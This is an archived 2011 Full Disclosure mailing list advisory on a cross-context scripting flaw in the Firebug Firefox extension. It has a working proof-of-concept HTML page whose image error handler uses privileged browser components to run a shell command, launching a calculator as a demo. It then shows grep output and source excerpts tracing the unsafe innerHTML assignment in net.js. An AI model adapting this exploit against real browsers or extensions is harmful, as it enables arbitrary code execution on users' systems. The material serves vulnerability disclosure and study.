Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Firebug Firefox Extension Cross Context Scripting Vulnerability

From: IEhrepus <5up3rh3i () gmail com>
Date: Sun, 19 Jun 2011 05:35:53 -0700
http://www.80vul.com/firefox/Firebug%20Firefox%20Extension%20Cross%20Context%20Scripting%20Vulnerability.htm

 *Firebug Firefox Extension Cross Context Scripting Vulnerability*



Author: www.80vul.com [Email:5up3rh3i#gmail.com]

2011/06/18 - Public Disclosure



*Description*



80vul.com discovered firebug that a famous firefox extension is vulnerable
to Cross Context Scripting, and this vul can execute evil codz in the chrome
privileged Firefox zone.so successful exploitation allows execution of
arbitrary code in user’s system.





*Exploitation*



a demo : http://www.80vul.com/firefox/firebug0day.htm



<html>

<head>firebug 0day</head>

<body>

<img src=2 onerror='var file = Components.classes["@mozilla.org/file/local;1
"].createInstance(Components.interfaces.nsILocalFile);file.initWithPath
("/bin/sh");var process =Components.classes["@mozilla.org/process/util;1"].
createInstance(Components.interfaces.nsIProcess);process.init(file);var
args= ["-c", "
gcalctool"];process.run(false, args, args.length);'></img>

</body>

</html>



Open the firebug, and visite the exploit's URL, then open "NET"
-->URL-->"HTML" , and gcalctool is executed.







*Analysis*



extract the code from firebug () software joehewitt com xpi by rar or zip .
then let’s go ...



80vul@ubuntu:~$ grep -in 'body.innerHTML' -r ./
firebug () software joehewitt com/ --colour

./firebug () software joehewitt com/content/firebug/traceModule.js:1128:
iframe.contentWindow.document.body.innerHTML = text;

./firebug () software joehewitt com/content/firebug/net.js:2561:
iframe.contentWindow.document.body.innerHTML = text;



80vul@ubuntu:~$ grep -in 'body.innerHTML' -r ./
firebug () software joehewitt com/content/firebug/net.js --colour -8

2553-        }

2554-

2555-        if (hasClass(tab, "netInfoHtmlTab") && file.loaded && !
netInfoBox.htmlPresented)

2556-        {

2557-            netInfoBox.htmlPresented = true;

2558-

2559-            var text = Utils.getResponseText(file, context);

2560-            var iframe = netInfoBox.getElementsByClassName("
netInfoHtmlPreview").item(0);

2561:            iframe.contentWindow.document.body.innerHTML = text;

2562-        }

2563-

2564-        // Notify listeners about update so, content of custom tabs can
be updated.

2565-        dispatch(NetInfoBody.fbListeners, "updateTabBody", [netInfoBox,
file, context]);

2566-    },

2567-

2568-    setResponseText: function(file, netInfoBox, responseTextBox,
context)

2569-    {



edit the content/firebug/net.js and seach "netInfoHtmlTab":



80vul@ubuntu:~$ gedit ./
firebug () software joehewitt com/content/firebug/net.js



Firebug.NetMonitor.NetInfoBody = domplate(Firebug.Rep, new Firebug.Listener
(),

{

    tag:

        DIV({"class": "netInfoBody", _repObject: "$file"},

            TAG("$infoTabs", {file: "$file"}),

            TAG("$infoBodies", {file: "$file"})

        ),



    infoTabs:

        DIV({"class": "netInfoTabs focusRow subFocusRow", "role": "tablist
"},

            A({"class": "netInfoParamsTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",

                view: "Params",

                $collapsed: "$file|hideParams"},

                $STR("URLParameters")

            ),

            A({"class": "netInfoHeadersTab netInfoTab a11yFocus", onclick:
"$onClickTab", "role": "tab",

                view: "Headers"},

                $STR("Headers")

            ),

            A({"class": "netInfoPostTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",

                view: "Post",

                $collapsed: "$file|hidePost"},

                $STR("Post")

            ),

            A({"class": "netInfoPutTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",

                view: "Put",

                $collapsed: "$file|hidePut"},

                $STR("Put")

            ),

            A({"class": "netInfoResponseTab netInfoTab a11yFocus", onclick:
"$onClickTab", "role": "tab",

                view: "Response",

                $collapsed: "$file|hideResponse"},

                $STR("Response")

            ),

            A({"class": "netInfoCacheTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",

               view: "Cache",

               $collapsed: "$file|hideCache"},

               $STR("Cache")

            ),

            A({"class": "netInfoHtmlTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",

               view: "Html",

               $collapsed: "$file|hideHtml"},

               $STR("HTML")

            )

        ),






hitest

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: